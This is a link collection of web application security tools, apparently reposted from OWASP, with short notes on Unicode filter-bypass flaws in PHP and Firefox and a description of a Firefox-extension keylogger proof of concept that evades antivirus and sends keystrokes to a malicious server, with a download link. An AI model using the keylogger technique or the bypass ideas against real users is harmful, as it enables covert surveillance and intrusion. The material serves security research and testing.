* Web Development Helper – http://www.nikhilk.net/Project.WebDevHelper.aspx
* FxCop:
o (blog) http://blogs.msdn.com/fxcop/
o (download) http://code.msdn.microsoft.com/codeanalysis
* Microsoft internal tools you can’t have yet:
o http://www.microsoft.com/windows/cse/pa_projects.mspx
o http://research.microsoft.com/Pex/
o http://www.owasp.org/images/5/5b/OWASP_IL_7_FuzzGuru.pdf

Threat modeling

Microsoft Threat Analysis and Modeling Tool v2.1 (TAM) – http://www.microsoft.com/downloads/details.aspx?FamilyID=59888078-9daf-4e96-b7d1-944703479451&displaylang=en
Amenaza: Attack Tree Modeling (SecurITree) – http://www.amenaza.com/software.php
Octotrike – http://www.octotrike.org/
Add-ons for Firefox that help with general web application security

Web Developer Toolbar – https://addons.mozilla.org/firefox/60/
Plain Old Webserver (POW) – https://addons.mozilla.org/firefox/3002/
XML Developer Toolbar – https://addons.mozilla.org/firefox/2897/
Public Fox – https://addons.mozilla.org/firefox/3911/
XForms Buddy – http://beaufour.dk/index.php?sec=misc&pagename=xforms
MR Tech Local Install – http://www.mrtech.com/extensions/local_install/
Nightly Tester Tools – http://users.blueprintit.co.uk/~dave/web/firefox/buildid/index.html
IE Tab – https://addons.mozilla.org/firefox/1419/
User-Agent Switcher – https://addons.mozilla.org/firefox/59/
ServerSwitcher – https://addons.mozilla.org/firefox/2409/
HeaderMonitor – https://addons.mozilla.org/firefox/575/
RefControl – https://addons.mozilla.org/firefox/953/
refspoof – https://addons.mozilla.org/firefox/667/
No-Referrer – https://addons.mozilla.org/firefox/1999/
LocationBar^2 – https://addons.mozilla.org/firefox/4014/
SpiderZilla – http://spiderzilla.mozdev.org/
Slogger – https://addons.mozilla.org/en-US/firefox/addon/143
Fire Encrypter – https://addons.mozilla.org/firefox/3208/
Add-ons for Firefox that help with Javascript and Ajax web application security

Selenium IDE – http://www.openqa.org/selenium-ide/
Firebug – http://www.joehewitt.com/software/firebug/
Venkman – http://www.mozilla.org/projects/venkman/
Chickenfoot – http://groups.csail.mit.edu/uid/chickenfoot/
Greasemonkey – http://www.greasespot.net/
Greasemonkey compiler – http://www.letitblog.com/greasemonkey-compiler/
User script compiler – http://arantius.com/misc/greasemonkey/script-compiler
Extension Developer’s Extension (Firefox Add-on) – http://ted.mielczarek.org/code/mozilla/extensiondev/
Smart Middle Click (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/3885/
Bookmarklets that aid in web application security

RSnake’s security bookmarklets – http://ha.ckers.org/bookmarklets.html
BMlets – http://optools.awardspace.com/bmlet.html
Huge list of bookmarklets – http://www.squarefree.com/bookmarklets/
Blummy: consists of small widgets, called blummlets, which make use of Javascript to provide rich functionality – http://www.blummy.com/
Bookmarklets every blogger should have – http://www.micropersuasion.com/2005/10/bookmarklets_ev.html
Flat Bookmark Editing (Firefox Add-on) – http://n01se.net/chouser/proj/mozhack/
OpenBook and Update Bookmark (Firefox Add-ons) – http://www.chuonthis.com/extensions/
SSL certificate checking / scanning

SSL Labs – https://www.ssllabs.com/ssldb/
[ZIP] THCSSLCheck – http://thc.org/root/tools/THCSSLCheck.zip
[ZIP] Foundstone SSLDigger – http://www.foundstone.com/us/resources/termsofuse.asp?file=ssldigger.zip
Cert Viewer Plus (Firefox Add-on) – https://addons.mozilla.org/firefox/1964/
Honeyclients, Web Application, and Web Proxy honeypots

Honeyclient Project: an open-source honeyclient – http://www.honeyclient.org/trac/
HoneyC: the low-interaction honeyclient – http://honeyc.sourceforge.net/
Capture: a high-interaction honeyclient – http://capture-hpc.sourceforge.net/
Google Hack Honeypot – http://ghh.sourceforge.net/
PHP.Hop – PHP Honeynet Project – http://www.rstack.org/phphop/
SpyBye – http://www.monkey.org/~provos/spybye/
Honeytokens – http://www.securityfocus.com/infocus/1713
Blackhat SEO and maybe some whitehat SEO

SearchStatus (Firefox Add-on) – http://www.quirk.biz/searchstatus/
SEO for Firefox (Firefox Add-on) – http://tools.seobook.com/firefox/seo-for-firefox.html
SEOQuake (Firefox Add-on) – http://www.seoquake.com/
Footprinting for web application security

Evolution – http://www.paterva.com/evolution-e.html
GooSweep – http://www.mcgrewsecurity.com/projects/goosweep/
Aura: Google API Utility Tools – http://www.sensepost.com/research/aura/
Edge-Security tools – http://www.edge-security.com/soft.php
Fierce Domain Scanner – http://ha.ckers.org/fierce/
Googlegath – http://www.nothink.org/perl/googlegath/
Advanced Dork (Firefox Add-on) – https://addons.mozilla.org/firefox/2144/
Passive Cache (Firefox Add-on) – https://addons.mozilla.org/firefox/977/
CacheOut! (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1453/
BugMeNot Extension (Firefox Add-on) – http://roachfiend.com/archives/2005/02/07/bugmenot/
TrashMail.net Extension (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1813/
DiggiDig (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/2819/
Digger (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1467/
Database security assessment

Scuba by Imperva Database Vulnerability Scanner – http://www.imperva.com/scuba/
Browser Defenses

DieHard – http://www.diehard-software.org/
LocalRodeo (Firefox Add-on) – http://databasement.net/labs/localrodeo/
NoMoXSS – http://www.seclab.tuwien.ac.at/projects/jstaint/
Request Rodeo – http://savannah.nongnu.org/projects/requestrodeo
FlashBlock (Firefox Add-on) – http://flashblock.mozdev.org/
CookieSafe (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/2497
NoScript (Firefox Add-on) – http://www.noscript.net/
FormFox (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1579/
Adblock (Firefox Add-on) – http://adblock.mozdev.org/
httpOnly in Firefox (Firefox Add-on) – http://blog.php-security.org/archives/40-httpOnly-Cookies-in-Firefox-2.0.html
SafeCache (Firefox Add-on) – http://www.safecache.com/
SafeHistory (Firefox Add-on) – http://www.safehistory.com/
PrefBar (Firefox Add-on) – http://prefbar.mozdev.org/
All-in-One Sidebar (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1027/
QArchive.org web file checker (Firefox Add-on) – https://addons.mozilla.org/firefox/4115/
Update Notified (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/2098/
FireKeeper – http://firekeeper.mozdev.org/
Greasemonkey: XSS Malware Script Detector – http://yehg.net/lab/#tools.greasemonkey
Browser Privacy

TrackMeNot (Firefox Add-on) – https://addons.mozilla.org/firefox/3173/
Privacy Bird – http://www.privacybird.com/
Application and protocol fuzzing (random instead of targeted)

Sulley – http://fuzzing.org/
taof: The Art of Fuzzing – http://sourceforge.net/projects/taof/
zzuf: multipurpose fuzzer – http://sam.zoy.org/zzuf/
autodafé: an act of software torture – http://autodafe.sourceforge.net/
EFS and GPF: Evolutionary Fuzzing System – http://www.appliedsec.com/resources.html

repost src: http://www.owasp.org/index.php/Phoenix/Tools
src: http://owasp.blogspot.com/2009/12/sql-injection-resources.html

The WASC Threat Classification is a cooperative effort to clarify and organize the threats to the security of a web site. The members of the Web Application Security Consortium have created this project to develop and promote industry standard terminology for describing these issues. Application developers, security professionals, software vendors, and compliance auditors will have the ability to access a consistent language and definitions for web security related issues.

src: http://projects.webappsec.org/Threat-Classification

JSView 2.0.5
All browsers include a “View Source” option, but none of them offer the ability to view the source code of external files. Most websites store their javascripts and style sheets in external files and then link to them within a web page’s…
https://addons.mozilla.org/sk/firefox/addon/2076

User Agent Switcher 0.7.2
The User Agent Switcher extension adds a menu and a toolbar button to switch the user agent of the browser.
https://addons.mozilla.org/sk/firefox/addon/59

1.- Overlong UTF-8:
As REQUIRED by UNICODE 3.1, and noted in the Unicode Technical Report #36, UTF-8 is forbidden to interpretate a character’s non-shortest form.

2.- Ill formed sequences:
As REQUIRED by UNICODE 3.0, and noted in the Unicode Technical Report #36, if a leading byte is followed by an invalid successor byte, then it should NOT consume it.

3.- Integer overflow:
Unsigned short has a size of 16 bits (2 bytes), that is UNCAPABLE of storing unicode characters of 21 bits, and represented on UTF with 4 bytes (1111 0xxx 10xx xxxx 10xx xxxx 10xx xxxx). PHP attempts to sum a 21 bits value to a 16 bits-size variable, and then makes no checks on the value.

The firefox one

Firefox is supposed to consider the non-shortest form exception (point #1 in the PHP vulnerabilities), and section 3.1 of the Unicode Technical Report #36 but apparently there’s a flaw on it. This is specially problematic for the reasons that an overlong unicode sequence not taken into consideration may allow several types of filter bypasses.

http://sirdarckcat.blogspot.com/2009/10/couple-of-unicode-issues-on-php-and.html

Httpry – HTTP Traffic sniffer

Httpry, is a sniffer specializing in sniffing http traffic. Httpry is used to log and display http traffic by capturing, parsing and logging the traffic for further analysis.

http://www.lifedork.net/httpry-http-traffic-sniffer.html
http://dumpsterventures.com/jason/httpry/httpry-0.1.5.tar.gz

Firefox Addons own ya – Keylogger POC

My small POC consists of a keylogger written in javascript and embedded into Firefox browser in form of extension. This code can be injected into any known/famous addon without even noticing it since it creates no warnings at Antiviruses (it’s just legal javascript) and no warning from Firewalls since the logs of the keystrokes are sent through Firefox on port 80 to a malicious server.

http://blogs.hackerscenter.com/2008/04/firefox-addons-threat.html
http://www.hackerscenter.com/public/Firefox_poc/poc_keylogger.zip